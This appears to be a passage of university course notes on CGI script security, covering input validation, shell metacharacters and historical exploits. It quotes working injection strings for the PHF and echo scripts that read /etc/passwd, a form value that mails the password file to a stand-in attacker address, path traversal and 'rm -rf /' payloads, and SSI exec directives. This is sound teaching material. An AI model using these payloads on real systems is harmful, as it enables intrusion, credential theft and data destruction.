CEG 499/699
Securing the Server Machine
Securing the Web Server Program
Secured Installation of the CGI Scripts
Validate Scripts Borrowed from the Web
Common Assumptions That Can Be False
Never Accept Unchecked Input
Cookie Caution
Server-side Includes
Redirection of HTTP Requests
OS Environment
Checking the Result Codes
SUID CGI Scripts
C
Shell
Perl
Python
CGI stands for Common Gateway Interface. The word "gateway"
is unrelated to its use in networking as a synonym for routers. CGI is a
standard that programs invoked via a web client are expected to follow: it
allows the web server to execute a separate program in order to generate
content. For example, http://www.example.com/cgi-bin/homepage.pl?user=rob
runs the program homepage.pl located in the directory named cgi-bin.
This program is supplied with user=rob in a so-called meta-variable, so that it can
generate content specific to the user "rob". Interactive web
sites, as well as e-commerce sites, typically use some form of CGI scripting to
produce their output.
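A minimal C sketch of how such a program might find its parameter, assuming a hypothetical helper named `get_param` (a real program would also URL-decode the value): it locates the raw value of one variable, such as `user`, in a query string like `user=rob`.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy the raw (still URL-encoded) value of `name`
 * from a query string such as "user=rob&lang=en" into buf.
 * Returns 0 on success, -1 if the name is absent or the value does not fit. */
int get_param(const char *qs, const char *name, char *buf, size_t bufsize)
{
    size_t nlen = strlen(name);
    const char *p = qs;

    while (p != NULL && *p != '\0') {
        /* Does this variable=value token begin with "name="? */
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *val = p + nlen + 1;
            size_t vlen = strcspn(val, "&");   /* value ends at the next '&' */
            if (vlen >= bufsize)
                return -1;                     /* refuse to truncate silently */
            memcpy(buf, val, vlen);
            buf[vlen] = '\0';
            return 0;
        }
        p = strchr(p, '&');                    /* move on to the next token */
        if (p != NULL)
            p++;
    }
    return -1;
}
```

In a real CGI program the query string would come from `getenv("QUERY_STRING")`, which may return NULL and must be checked before use.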
CGI programs are written in scripting languages such as Perl and Python (Microsoft ASP pages play a similar role), in traditionally compiled languages such as C, and in byte-code languages such as Java. The privileges and abilities of a CGI program are controlled by the web server's configuration and by file permissions and access control lists. The triggering URL embeds the user's input, if any. The URL may be essentially pre-built, or built on the fly by an applet running in the web client program. The end result of invoking a CGI program is the output it returns: typically a string that constitutes a valid HTML page, preceded by a short header.
The front-end interface to a CGI program is an HTML document called a form. Forms include the HTML tag <INPUT>. Each <INPUT> tag has a variable name associated with it, and the contents of the field form the value portion of a variable=value token. Form data is a stream of variable=value pairs separated by the & character. Actual CGI scripts may perform input filtering on the contents of the <INPUT> field. Another HTML tag sometimes seen in forms is <SELECT>, which lets the user on the client side choose from a finite list of choices.
The following is an illustration of how a form submission on the client machine generates a triggering URL, and how the corresponding CGI program is invoked on the server.
Here is the HTML code for the above.
<form action="http://www.google.com/search" method="get" name="f">
Submitting this form with the words CGI vulnerability scanners produces the URL
http://www.google.com/search?q=CGI+vulnerability+scanners&btnG=Google+Search
The web server process at www.google.com follows its configuration rules to
locate the CGI program named search, and invokes it.
This invocation is generally done by forking a child process with the same
privileges as the web server, and then exec-ing the program.
CGI uses meta-variables (formerly called environment variables) to
send the CGI program its parameters. Three of these variables, QUERY_STRING,
PATH_INFO, and PATH_TRANSLATED, are relevant to us right away.
QUERY_STRING is defined as anything that follows the first ? in
the URL. This information could be added by an ISINDEX document or by an
HTML form (with the GET method), or it could be manually embedded in an HTML
anchor. The string is encoded in the standard URL format: spaces become +,
and special characters are encoded as %xx hexadecimal escapes. When the query
string contains no unencoded = (as with an ISINDEX search), the web server may
also split it at each + and pass the words to the program as command-line
arguments in argv[]. For example, the query string "CGI vulnerability
scanners" would be given to your program as
argv[1]="CGI", argv[2]="vulnerability", and
argv[3]="scanners". Note that a %00 in the QUERY_STRING decodes to the NUL
character, which C string functions treat as the end of the string, so
everything after it is silently dropped.
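The encoding rules above can be sketched as a decoder in C. This is an illustrative version, not taken from any particular server; the function name `url_decode` and the choice to reject `%00` outright (rather than decode it into a string terminator) are assumptions.

```c
#include <ctype.h>
#include <stddef.h>

/* Value of one hex digit; the caller has already checked isxdigit(). */
static int hexval(int c)
{
    if (c >= '0' && c <= '9')
        return c - '0';
    return tolower(c) - 'a' + 10;
}

/* Decode a URL-encoded string: '+' becomes a space and %xx becomes the
 * byte with that hex value. Returns the decoded length, or -1 on a
 * malformed escape, on %00 (an embedded string terminator), or if dst
 * (dstsize bytes) is too small. */
long url_decode(const char *src, char *dst, size_t dstsize)
{
    size_t n = 0;

    while (*src != '\0') {
        int c = (unsigned char)*src;
        if (c == '+') {
            c = ' ';
            src++;
        } else if (c == '%') {
            if (!isxdigit((unsigned char)src[1]) ||
                !isxdigit((unsigned char)src[2]))
                return -1;                 /* truncated or bad escape */
            c = hexval((unsigned char)src[1]) * 16 +
                hexval((unsigned char)src[2]);
            if (c == 0)
                return -1;                 /* reject %00 instead of truncating */
            src += 3;
        } else {
            src++;
        }
        if (n + 1 >= dstsize)
            return -1;                     /* keep room for the terminator */
        dst[n++] = (char)c;
    }
    if (dstsize == 0)
        return -1;
    dst[n] = '\0';
    return (long)n;
}
```

Note that the decoder faithfully turns %0a into a newline; deciding whether a newline is acceptable in a given field is a separate validation step, as the PHF example below shows.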
PATH_INFO carries any extra path information that follows the program's name
in the URL, and is typically used to suggest file locations to the CGI program.
Suppose the URL for a CGI program foobar is http://foo.bar.org/cgi-bin/foobar.
Upon receiving the URL http://foo.bar.org/cgi-bin/foobar/extra/path/info/,
the web server will set PATH_INFO to
"/extra/path/info/". The server also sets the PATH_TRANSLATED
variable to the full path name of "/extra/path/info/", obtained by
prepending the server's DocumentRoot.
If the form has METHOD="GET" in its FORM tag, the CGI program
will receive the encoded form input in the environment variable QUERY_STRING.
If the form has METHOD="POST" in its FORM tag, the CGI
program will receive the encoded form input on stdin. In that case the
program must not wait for end-of-file; it detects the end of input from the
value of the environment variable CONTENT_LENGTH, which gives the number of
bytes to read.
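A sketch of reading POST data in C, assuming a hypothetical size limit `MAX_FORM_BYTES`: the program relies neither on end-of-file nor on an unchecked CONTENT_LENGTH, and reads exactly the announced number of bytes into a buffer sized from that number.

```c
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical upper bound on accepted form data. */
#define MAX_FORM_BYTES 65536L

/* Read a POST body of exactly CONTENT_LENGTH bytes from `in` (stdin in a
 * real CGI program). Returns a NUL-terminated malloc'd buffer, or NULL if
 * CONTENT_LENGTH is missing, malformed, too large, or the body is short. */
char *read_post_body(FILE *in, const char *content_length)
{
    char *end, *body;
    long len;
    size_t got;

    if (content_length == NULL)
        return NULL;
    len = strtol(content_length, &end, 10);
    if (end == content_length || *end != '\0' ||
        len < 0 || len > MAX_FORM_BYTES)
        return NULL;                       /* not a plain decimal within limit */

    body = malloc((size_t)len + 1);
    if (body == NULL)
        return NULL;
    got = fread(body, 1, (size_t)len, in); /* never read past len bytes */
    if (got != (size_t)len) {
        free(body);
        return NULL;
    }
    body[len] = '\0';
    return body;
}
```

A real program would call it as `read_post_body(stdin, getenv("CONTENT_LENGTH"))` and free the result when done.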
Most CGI programs reside in a directory named cgi-bin. The full path name of this directory can be anything, but a typical web server is configured so that it appears at the root of the URL space, as in /cgi-bin.
CGI programs can return a myriad of document types: an image file, an HTML document, a plain text document, an audio clip, etc. They can also return references to other documents. To inform the web server what kind of document the CGI program is returning, CGI requires a header consisting of a few lines. The output is thus essentially of two kinds: a document, or a reference to another document.
When returning a document, you must tell the server what kind of document you will be
outputting via a MIME type. Common MIME types are things such as text/html
for HTML, and text/plain for straight ASCII text.
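For example, to send back HTML to the client, the output from the CGI program should be as follows; the empty line after the header is required, because it marks the end of the header:
Content-type: text/html

<HTML><HEAD>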
<TITLE>HTML output from CGI script</TITLE>
</HEAD><BODY>
<H1>Sample output</H1>
What do you think of <STRONG>this?</STRONG>
</BODY></HTML>
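The same response can be produced from C. This sketch (the function `emit_html` is hypothetical) writes the header, the empty line that ends it, and then the document; `title` and `body_html` are assumed to be trusted text, since copying user input into HTML raises problems discussed later in these notes.

```c
#include <stdio.h>

/* Write a complete CGI response to `out`: the Content-type header, the
 * empty line that terminates the header section, then the HTML document.
 * title and body_html are assumed to be trusted (not user-supplied). */
void emit_html(FILE *out, const char *title, const char *body_html)
{
    fputs("Content-type: text/html\n", out);
    fputs("\n", out);                      /* end of header section */
    fprintf(out,
            "<HTML><HEAD>\n<TITLE>%s</TITLE>\n</HEAD><BODY>\n%s\n</BODY></HTML>\n",
            title, body_html);
}
```

A CGI program would pass `stdout` as `out`.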
Instead of outputting the document, you can just tell the browser where to get the new one, or have the server automatically output the new one for you.
For example, say you want to reference a file on your Gopher server. In this case, you should know the full URL of what you want to reference and output something like:
Content-type: text/html
Location: gopher://httprules.foobar.org/0

<HTML><HEAD>
<TITLE>Sorry...it moved</TITLE>
</HEAD><BODY>
<H1>Go to gopher instead</H1>
Now available at
<A HREF="gopher://httprules.foobar.org/0">a new location</A>
on our gopher server.
</BODY></HTML>
CGI programs have been a rich source of security holes. Although the CGI protocol is not inherently insecure, CGI programs must be written with as much care as any other program that may be invoked by untrusted users with deviously constructed inputs. It is also typical that Web administrators are less skilled in security matters than typical system administrators, and install CGI programs at their sites without realizing the associated problems. The vulnerabilities caused by the use of CGI scripts are not weaknesses in CGI itself, but weaknesses inherent in the HTTP specification and in various system programs; CGI simply allows easier access to those vulnerabilities. There are, of course, other ways to exploit them. For example, insecure file permissions can be exploited using FTP or telnet.
CGI exploits take advantage of weaknesses on the web server side. By definition, a CGI exploit does not "work" on the client. Exploits on the web client side are, of course, possible via downloaded code such as Java applets, JavaScript, ActiveX controls, and VBScript.
A CGI program runs on the server with the privileges the web server grants it, so it can read files and start shells. A clever script can corrupt file systems on server machines and their attached hosts. Past CGI exploits have caused such things as unauthorized removal, insertion, or alteration of data on the Web server, reduced performance, halted services, use of the Web server to carry out attacks, and use of the Web server as a Trojan horse into other systems, including your local intranet. Means of gaining access include exploiting assumptions the script makes but does not check, exploiting weaknesses in the server environment, and exploiting weaknesses in other programs and system calls. The primary weakness in CGI scripts is insufficient input validation.
The Appendix titled "A List of Specific CGI Scripts Exploited" gives a fairly complete list as of June 2001. Below we describe a few selected examples so that the reader has a better appreciation of the issues.
The "phone book functionality" (PHF) script uses a form-based interface to get a name as input and look up the corresponding name and address information on the server. The exploit described here uses it to display the password file (as a Web page), which can then be run through a password cracker (such as Crack). The script was included as a CGI example with the NCSA and Apache httpd servers.
Unfortunately, the PHF script did an incomplete job of checking its inputs
for tricks. The script used a call to escape_shell_cmd(), a
function that was supposed to cleanse input of "special characters."
The function failed to check for one particular character, the newline character
(\n or 0x0a). A knowledgeable attacker can thus
provide input to the form (through a URL) that includes a newline character. So
a URL such as
http://www.university.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
passes through the filter unchanged. The shell treats the newline as a command
separator, so the command /bin/cat /etc/passwd that follows it sends the
contents of the local (i.e., on the web server) password file to the client.
The PHF script was so widely exploited that most intrusion detection tools now check for its presence.
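The flaw can be reproduced in a few lines of C. The blacklist below is an illustrative stand-in, not the actual escape_shell_cmd() source: like the PHF filter, it omits the newline, so the decoded attack string passes. A whitelist that names the few characters that are allowed (the set used here is an assumption) rejects the same string without having to anticipate every dangerous character.

```c
#include <string.h>

/* Illustrative blacklist in the style of the filter PHF relied on. The
 * list comes from the metacharacters discussed in these notes, not from
 * the original escape_shell_cmd() source; like that filter, it has no '\n'. */
static const char FLAWED_BLACKLIST[] = ";<>*|`&$!#()[]{}:'\"";

/* Returns 1 if s contains no character from blacklist, 0 otherwise. */
int passes_blacklist(const char *s, const char *blacklist)
{
    return s[strcspn(s, blacklist)] == '\0';
}

/* Whitelist alternative: accept only characters known to be harmless in
 * an alias (assumed here to be letters, digits, '.' and '_'). */
int passes_whitelist(const char *s)
{
    static const char ok[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._";
    return s[strspn(s, ok)] == '\0';
}
```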
A prime example of a security risk is a form that allows one to enter arbitrary system commands. A "whois" CGI script can be written that directly runs the whois command with the domain name provided and returns information about that domain name. Since the input becomes part of a UNIX shell command line, one could enter something like "; rm -fr /*", which would remove every file on the Web server that the Web server's user is allowed to delete, including log files, instead of looking up a domain name. A properly written script would check that the input is a valid domain name, consisting only of alphanumeric characters delimited by periods, before running whois.
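A sketch of that check in C, under the assumption that hyphens (which are legal inside DNS labels) are also accepted as long as they neither begin nor end a label; the function name `is_valid_domain` is hypothetical. Because no label may begin with '-', the input also cannot be mistaken for a whois option.

```c
#include <ctype.h>
#include <string.h>

/* Returns 1 if s looks like a domain name made of labels of letters,
 * digits and inner hyphens, separated by single periods (e.g.
 * "wright.edu"); returns 0 otherwise. Characters such as ';', ' ', '/'
 * and '\n' are rejected outright. */
int is_valid_domain(const char *s)
{
    size_t len = strlen(s), label = 0, i;

    if (len == 0 || len > 253)
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            if (label == 0 || s[i - 1] == '-')
                return 0;              /* empty label, or label ends in '-' */
            label = 0;
        } else if (isalnum(c) || (c == '-' && label > 0)) {
            if (++label > 63)
                return 0;              /* DNS labels are at most 63 octets */
        } else {
            return 0;                  /* any other character is refused */
        }
    }
    return label > 0 && s[len - 1] != '-';   /* no trailing '.' or '-' */
}
```

Only a name that passes this test should be handed to whois, preferably as a separate argument rather than through a shell command line.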
Suppose a form lets a user e-mail a message to a specified person. The HTML form page will include code like the following:
<INPUT TYPE="radio" NAME="send_to" VALUE="pmateti@cs.wright.edu">Mateti<br>
<INPUT TYPE="radio" NAME="send_to" VALUE="lball@lanl.gov">Lucille Ball<br>
<INPUT TYPE="radio" NAME="send_to" VALUE="gburns@lanl.gov">George Burns
Now suppose the script writes the message to a temporary file and then e-mails that file to the selected address. In Perl, this could be done with
system("/usr/lib/sendmail -t $send_to < $temp_file");
As long as the user selects from the addresses that are given, everything will
work fine. There is, however, no way to be sure of that. Because the HTML form
itself has been transferred to the user's client machine, he or she is free to
edit it to read something like
<INPUT TYPE="radio" NAME="send_to" VALUE="aarkin@lanl.gov;mail badguy@evil-empire.org </etc/passwd #"> Alan Arkin<br>
As soon as this is submitted, the shell ends the original sendmail command at the semicolon and executes the next command (the trailing # comments out the rest of the original command line), which mails the password file to the attacker, who could then run it through a password cracker and use the results to gain login access to your machine.
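One way to close this hole, sketched in C with a hypothetical table and function name: the form sends only a short key, and the server maps it to an address it controls, so nothing the client edits can reach the sendmail command line.

```c
#include <stddef.h>
#include <string.h>

/* Server-side table of permitted recipients. The form would send only a
 * key (hypothetically "mateti", "ball" or "burns"); the address given to
 * sendmail always comes from this table, never from the client. */
struct recipient {
    const char *key;
    const char *address;
};

static const struct recipient RECIPIENTS[] = {
    { "mateti", "pmateti@cs.wright.edu" },
    { "ball",   "lball@lanl.gov" },
    { "burns",  "gburns@lanl.gov" },
};

/* Returns the address for key, or NULL if key is not in the table. */
const char *lookup_recipient(const char *key)
{
    size_t i;

    for (i = 0; i < sizeof RECIPIENTS / sizeof RECIPIENTS[0]; i++)
        if (strcmp(key, RECIPIENTS[i].key) == 0)
            return RECIPIENTS[i].address;
    return NULL;
}
```

Even with the table, the address is best passed to sendmail as a separate argument rather than through system().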
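This PERL program decodes the %xx hexadecimal escapes in the query string back into the characters they represent, backslash-escapes a list of shell metacharacters, and then passes the result to /bin/echo through the shell. Its effect is similar to that of the echo command (a bash built-in).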
#!/usr/bin/perl
# usage: http://your.host/cgi-bin/echo?
# Echoes back the QUERY_STRING to the user.
$| = 1;
$in = $ENV{'QUERY_STRING'};
$in =~ s/%(..)/pack("c",hex($1))/ge;
# Escape the nasty metacharacters
# (List courtesy of http://www.cerf.net/~paulp/cgi-security/safe-cgi.txt)
$in =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
print "Content-type: text/html\n\n";
system("/bin/echo $in");
Install this program in cgi-bin/echo and the URL
http://your.host/cgi-bin/echo?hello%20there
will return a page containing the text
"hello there"
By inserting %0A, the code for the newline character (just as %20
represents the blank), one can make the shell run any command one
wishes, because the newline is not in the escape list. For example, the URL
http://your.host/cgi-bin/echo?%0Acat%20/etc/passwd
will bring back a page with a copy of the /etc/passwd file.
viewsrc.cgi v2.0 is a source-code viewing CGI script available from http://www.mimanet.com/scripts. A
vulnerability exists which allows a remote user to view any file on the
server. The following URL demonstrates the problem:
http://localhost/cgi-bin/viewsrc.cgi?loc=../[any file outside restricted dir]
Apply the following patch to viewsrc.cgi:
53a54,56
>$FORM{'loc'} =~ s/\.\.//g;
>$FORM{'loc'} =~ s/\\//g;
>$FORM{'loc'} =~ s/\///g;
65c68
<open (INHTML, "$predo") or die &err_loc;
---
>open (INHTML, "<$predo") or die &err_loc;
This patch removes any '..', '/', or '\' characters present in the $FORM{'loc'} variable.
It also makes the open() command safer by using the '<' read-only specifier.
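A stricter alternative to the patch, sketched in C (the function name and the allowed character set are assumptions): instead of deleting suspicious characters, which silently rewrites the request, the script rejects any loc value that is not a plain file name.

```c
#include <string.h>

/* Accept name only if it is a plain file name inside the viewing
 * directory: letters, digits, '_', '-' and '.', not starting with '.'
 * (so no "..", no hidden files) and with no '/' or '\\' at all.
 * Returns 1 if acceptable, 0 otherwise. */
int is_safe_filename(const char *name)
{
    static const char ok[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-.";
    size_t len = strlen(name);

    if (len == 0 || len > 255 || name[0] == '.')
        return 0;
    return strspn(name, ok) == len;   /* every character is in the set */
}
```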
Vendor Status: MIMAnet was contacted via <webmaster@mimanet.com> on
Tuesday, May 1, 2001. Roberto R. Morelli <morelli@altair7.com> quickly
replied and stated that the problem was verified and an official fix would be
released. Twenty-two days have passed, and nothing has been done.
In the post-query sample CGI program, the overflow condition is very easily exploitable because, odd as it may seem, the code itself supplies the pointer to the exploit code. The pointer therefore does not need to be guessed at all, which makes life much easier for crackers.
#define MAX_ENTRIES 10000
typedef struct {
char *name;
char *val;
} entry;
...
main (int argc, char *argv[])
{
entry entries[MAX_ENTRIES];
...
for(x=0; cl && (!feof(stdin)); x++) {
m=x;
entries[x].val = fmakeword(stdin,'&',&cl);
plustospace(entries[x].val);
unescape_url(entries[x].val);
entries[x].name = makeword(entries[x].val,'=');
}
}
"Fellow C programmers would surely see the problem right away. By feeding 10,000
bogus entries, and then sending a specially prepared buffer for the 10,001'th,
you get a situation where memory is allocated, the exploit code is written into
it and the pointer is then put into the 10,001'st position of the entries struct.
This happens to be the position of the return pointer. When the program ends, it
does not call `exit' as I would say most network applications should, instead it
returns to __start, or in a case where the return pointer has been overwritten,
it returns to the user-supplied code. The only problem with this exploit is that
`fmakeword' allocates 102400 bytes for each buffer. Before you think that the
problem then becomes entirely theoretical, consider that most modern kernels do
not give the programs actual physical memory until the memory is written to. A
fair estimate would be that to be vulnerable the server would need around
40-50MB of physical and/or virtual memory, but I can't say for certain. To sum it
up, this exploit is real, you may be vulnerable if you have the post-query CGI
on your web servers (and it is *very* common). You may be lucky enough to have
an OS that prohibits the application from successfully allocating the needed
memory. Better safe than sorry: remove the program if you have it! No one should
really need this type of application since it is a sample program designed to
demonstrate how CGI works."
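The missing bounds check can be seen in this self-contained C sketch. It replaces fmakeword() and makeword(), whose source is not shown here, with a simple in-place split of `name=value&...` data (no URL decoding); the function name `parse_form` is hypothetical. The point is the test `x >= max` before every store into `entries`.

```c
#include <string.h>

#define MAX_ENTRIES 10000

typedef struct {
    char *name;
    char *val;
} entry;

/* Split form data "n1=v1&n2=v2..." (modified in place) into at most max
 * entries. Unlike the post-query loop, the index is checked against the
 * array size before every store, so 10,001 pairs produce an error rather
 * than a write past the end of entries. Returns the number of entries,
 * or -1 if there were too many. */
int parse_form(char *data, entry *entries, int max)
{
    int x = 0;
    char *tok = data;

    while (tok != NULL && *tok != '\0') {
        char *amp = strchr(tok, '&');
        char *eq;

        if (amp != NULL)
            *amp = '\0';                   /* terminate this name=value token */
        if (x >= max)
            return -1;                     /* the check post-query lacked */
        eq = strchr(tok, '=');
        entries[x].name = tok;
        if (eq != NULL) {
            *eq = '\0';
            entries[x].val = eq + 1;
        } else {
            entries[x].val = tok + strlen(tok);   /* empty value */
        }
        x++;
        tok = (amp != NULL) ? amp + 1 : NULL;
    }
    return x;
}
```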
Start with a properly configured server, applying all the recommendations of [Mateti 2001]. This includes appropriate screening at the router, turning off unneeded daemons, and restricting the file system. Additional precautions may be required, depending upon the partition in which you are working, who the intended audience is, and the sensitivity level of the data on the machine. These precautions include monitoring who accesses the scripts and the other activities those users perform, and consulting with your computer security officer as needed.
www, and group www.
Get rid of CGI script interpreters in bin directories: http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html
Run your Web server in a chroot()ed environment to protect the machine against yet-to-be-discovered exploits.
4.2.1 Apache
4.2.2 IIS
4.2.3 MS Personal Web Server
4.2.4 Zope
Remove unsafe CGI scripts. Widely exploited CGI scripts include: Count.cgi, test-cgi, php.cgi, handler, webgais, websendmail, webdist.cgi, faxsurvey, htmlscript, pfdisplay, perl.exe, wwwboard.pl, www-sql, service.pwd, users.pwd, aglimpse, man.sh, view-source, campas, and nph-test-cgi. Simple scanning tools like cgiscan look for these problematic scripts in their usual locations. See the list in the Appendix.
Note that successful input validation attacks have been seen
against ASP and Cold Fusion Markup Language (CFML) programs as well, so
programs in cgi-bin are not the only server-side functionality that introduces
security problems. If you have to provide server-side programs, think carefully
about how you handle input.
For example, to test a finger script, try sending URLs such as:
http://myserver/cgi-bin/finger?dave; touch%20/tmp/gotcha
http://myserver/cgi-bin/finger?dave; touch+/tmp/gotcha
If it is possible to send a form or URL that successfully executes this command (that is, /tmp/gotcha appears), then in principle any command could be run. The CGI script should then be reworked until it is not possible to send any unwanted system command.
CGI programs are called with user-supplied inputs as arguments. Each incoming entry must be checked against the kind of data actually expected for it. For instance, the syntax of a phone number, a monetary amount, a name, a mailing address, and so on can all be rigorously described using formal language grammars.
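As an example of such a grammar, here is a C recognizer for a hypothetical monetary-amount format, `amount ::= digit { digit } [ "." digit digit ]`. Validating against a positive description like this accepts only what is expected, instead of trying to list what is dangerous; the 12-digit cap on the integer part is an arbitrary assumption.

```c
#include <ctype.h>

/* Recognizer for the hypothetical grammar
 *     amount ::= digit { digit } [ "." digit digit ]
 * e.g. "12" or "12.50". Signs, spaces, exponents and trailing junk are
 * all rejected. Returns 1 if s matches, 0 otherwise. */
int is_amount(const char *s)
{
    const char *p = s;
    int digits = 0;

    while (isdigit((unsigned char)*p)) {
        p++;
        if (++digits > 12)
            return 0;                  /* arbitrary cap on the integer part */
    }
    if (digits == 0)
        return 0;                      /* at least one digit is required */
    if (*p == '.') {
        if (!isdigit((unsigned char)p[1]) || !isdigit((unsigned char)p[2]))
            return 0;                  /* exactly two digits after '.' */
        p += 3;
    }
    return *p == '\0';
}
```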
The input given may contain metacharacters, such as dot, comma, semicolon, slash, exclamation mark, etc. Make sure that these are permissible in the given context. The following characters in user-supplied data (the \n at the end stands for the newline character) should be examined carefully and, if suspect, escaped:
;<>*|`&$!#()[]{}:'"/\n
For server-side includes, check for "<" and ">"
in order to identify and validate any embedded HTML tags.
Disallow slashes, dots, etc. Look for any occurrence of "/../" (which might indicate that the user is attempting to access higher levels of the directory structure).
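Looking for "/../" alone misses "../" at the start of a path and "/.." at its end. This C sketch (the name `has_dotdot` is hypothetical) checks every slash-separated component instead; it assumes '/' is the only separator, so a server on Windows would also need to treat '\' as one.

```c
#include <string.h>

/* Returns 1 if path has a ".." component: "..", "../x", "x/.." or
 * "x/../y". Names that merely contain dots, such as "a..b" or
 * "file.tar.gz", are not flagged. */
int has_dotdot(const char *path)
{
    const char *p = path;

    while (*p != '\0') {
        size_t len = strcspn(p, "/");      /* length of this component */
        if (len == 2 && p[0] == '.' && p[1] == '.')
            return 1;
        p += len;
        if (*p == '/')
            p++;                           /* step over the separator */
    }
    return 0;
}
```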
CGI applications have to be careful when passing user data on the command line for calls to other programs. An attacker can trick your application into executing extra commands or modifying parameters of running programs by submitting data that will be interpreted as command-line switches or options.
Suppose you are invoking grep on a text database and that a form provides the regular expression. The naïve approach
system("grep $exp database");
or its equivalent has a number of problems. What if exp has the value "root
/etc/passwd;rm"? Not only does grep search the wrong file, the shell also
deletes the real database.
system("grep \"$exp\" database");
Neither double nor single quotes actually solve the problem. With double quotes,
for example, exp could be `rm -rf /` (including the backquotes), which the shell
still executes. Single quotes avoid this, but both suffer from values that contain
the quote character itself, such as 'root /etc/passwd;rm' (including the single
quotes): the embedded quotation marks match the ones that enclose the variable,
completely negating their effect.
system("grep", "-e", $exp, "database");
It is unnecessary to escape characters if you invoke programs as above, because the arguments are passed directly to grep without a shell ever parsing them.
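$exp =~ s/(\W)/\\$1/g; system("grep \"$exp\" database");
or, in C, where normal() stands for a test that accepts only safe characters such as letters and digits, tmp2 holds at least 2*strlen(exp)+1 bytes, and tmp is a char array:
for (i = 0, p = tmp2; exp[i]; i++) {
    if (!normal(exp[i])) *(p++) = '\\';   /* backslash-escape anything else */
    *(p++) = exp[i];
}
*p = 0;
snprintf(tmp, sizeof tmp, "grep \"%s\" database", tmp2);   /* use the escaped copy */
system(tmp);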
The above solutions handle all the problems discussed so far. One more problem
explains the "-e" in the list form of system() above: if exp were -i and were
passed to grep as an ordinary argument, grep would take it as an option and then
treat "database" as the pattern, searching its standard input for that string.
Using the "-e" option to grep prevents this. In general you never want to call a
program that cannot tell that an argument isn't a switch, unless you can restrict
the possible values of exp. GNU utilities are really good this way, since they
accept "--" as an end-of-switches marker.
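In C, the counterpart of Perl's list form of system() is to fork and exec the program with an argument vector, so no shell ever parses exp. The sketch below (function names are hypothetical) also passes "-e", so a pattern such as -i is not mistaken for an option; it assumes grep is found on the PATH, which a careful script would set explicitly.

```c
#define _POSIX_C_SOURCE 200809L
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run argv[0] with the given argument vector, with no shell involved.
 * Returns the program's exit status, or -1 if fork/exec/wait failed. */
int run_argv(char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid == -1)
        return -1;                     /* fork failed: report, do not continue */
    if (pid == 0) {
        execvp(argv[0], argv);         /* returns only on failure */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Search database for the user-supplied pattern exp. "-e" marks exp as
 * the pattern even if it begins with '-', and since no shell parses the
 * command, characters such as ';', '`' or '"' in exp have no effect.
 * Returns grep's exit status: 0 match, 1 no match, 2 error. */
int grep_database(const char *exp, const char *database)
{
    char *const argv[] = { "grep", "-e", (char *)exp, (char *)database, NULL };
    return run_argv(argv);
}
```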
Any of the following server-side include directives (written as HTML comments) would be a security hole if user-supplied text containing them ended up in a document that the server parses:
<!--#exec cmd="rm -rf /"-->
<!--#include file="secretfile"-->
The second directive is not as general as the first, and is less likely to be a security hole if the web server restricts the file names it accepts. The simplest protection measure is to not permit the web server to parse documents for server-side includes.
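If a script copies user-supplied text into a page that the server later parses for includes (a guestbook page, say), escaping '<' and '>' keeps the text from ever forming a directive. A minimal C sketch, with a hypothetical function name:

```c
#include <stddef.h>
#include <string.h>

/* Copy src into dst with '<', '>', '&' and '"' replaced by HTML
 * entities, so echoed user text can never form a tag or an SSI directive
 * such as <!--#exec ...-->. Returns 0, or -1 if dst (dstsize bytes) is
 * too small. */
int html_escape(const char *src, char *dst, size_t dstsize)
{
    size_t n = 0;

    for (; *src != '\0'; src++) {
        const char *rep;
        char one[2] = { *src, '\0' };  /* an ordinary character as a string */

        switch (*src) {
        case '<': rep = "&lt;";   break;
        case '>': rep = "&gt;";   break;
        case '&': rep = "&amp;";  break;
        case '"': rep = "&quot;"; break;
        default:  rep = one;      break;
        }
        size_t len = strlen(rep);
        if (n + len >= dstsize)
            return -1;                 /* keep room for the terminator */
        memcpy(dst + n, rep, len);
        n += len;
    }
    if (dstsize == 0)
        return -1;
    dst[n] = '\0';
    return 0;
}
```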
Redirecting HTTP requests can bypass access control rules. A less likely problem is redirection to file: URLs, which allows any file readable by the CGI program to be accessed. Some mechanisms for redirecting HTTP requests that handle both GET and POST requests may also pass on PUT and DELETE. Verify that PUT and DELETE requests are not accepted by the web server.
Occasionally an author expresses a preference for compiled programs over interpreted scripts (in languages such as shell, Perl, or Python). Such an author reasons that a binary is harder to make sense of if a user manages to get a copy of it, and therefore harder to search for potential weaknesses. This is security through obscurity. The more essential point, however, is that script interpreters generally permit powerful manipulation of text strings, parse the source of the script late, and bind names late, so data can more easily end up being treated as code.
Most C programs use arrays without doing bounds checking, and also have arbitrary limits on array sizes. This enables the "buffer overflow" technique which can corrupt a program's stack so that arbitrary commands can be executed.
while( <FILE> ){ print if /$exp/; }
This code will not cause anything nasty to be executed. The problem with this
code is that an error in exp will cause the CGI script to get a compilation error
(which the httpd will probably report as a server internal error). This is
a poor way to handle incorrect input. Rather than manually check the syntax of a
PERL regular expression, we can have PERL safely check it for us.
&complain("Illegal regexp.") if !defined eval { if ("a" =~ /$exp/){}0;};
Here eval is used as an exception-handling mechanism. There are several ways of invoking eval. Summarizing from the
PERL man pages: eval $x or eval "$x"
is not safe, whereas eval { ... $x ... } or eval '... $x ...'
is safe. In the safe forms, $x is used as a string, number, or whatever inside
the code in the curly braces or single quotes, rather than being compiled as code.
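C programs can perform the same check with the POSIX regcomp() function, which returns a nonzero error code for an invalid pattern instead of aborting. This sketch assumes POSIX extended regular expression syntax, which differs from Perl's; the helper name is hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <regex.h>
#include <stddef.h>

/* Compile a user-supplied regular expression, reporting failure as an
 * ordinary input error instead of letting it end the script. On success
 * the caller owns *re and must regfree() it. Returns 0 or -1; on failure
 * errbuf holds regerror()'s human-readable reason. */
int compile_user_regex(const char *exp, regex_t *re,
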